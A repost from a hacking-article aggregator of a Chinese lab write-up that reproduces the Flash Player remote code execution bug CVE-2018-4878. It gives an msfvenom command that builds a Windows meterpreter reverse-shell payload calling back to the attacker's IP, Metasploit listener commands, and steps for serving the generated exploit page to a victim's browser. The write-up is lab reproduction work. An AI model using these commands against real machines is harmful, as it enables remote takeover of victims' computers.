记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Flash RCE 漏洞(CVE-2018-4878)复现

2021-05-26 23:16

0x01 前言

该漏洞影响 Flash Player 版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。

0x02 环境

攻击机: kali 2018  (192.168.59.6)
靶机: Windows 10 x64   (192.168.59.160)
Web服务器: Windows 7 X64  (192.168.59.127)

0x03 复现过程


  1. 我们先在kali生成一个python类型的shellcode
    msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f python > /root/shellcode.txt


  1. 替换EXP里面的shellcode

  2. 使用cve-2018-4878.py生成文件,我这里用的是Sublime Text 3 Ctrl+B运行python,会在本目录下生成两个文件index.html,exploit.swf

  3. 然后把这两个文件放到Web服务器里面

  4. 在kali的MSF里面设置监听

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.59.6
    msf exploit(handler) > set LPORT 6666
    msf exploit(handler) > exploit
  5. 然后使用靶机的win10 IE访问Web服务器的文件index.html

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的



知识来源: https://mp.weixin.qq.com/s?__biz=MzkwMTE4NDM5NA==&mid=2247484354&idx=1&sn=51159897ffa4b005c9d9cb056add303a

阅读:87574 | 评论:0 | 标签:漏洞 CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“Flash RCE 漏洞(CVE-2018-4878)复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁

本页关键词 💎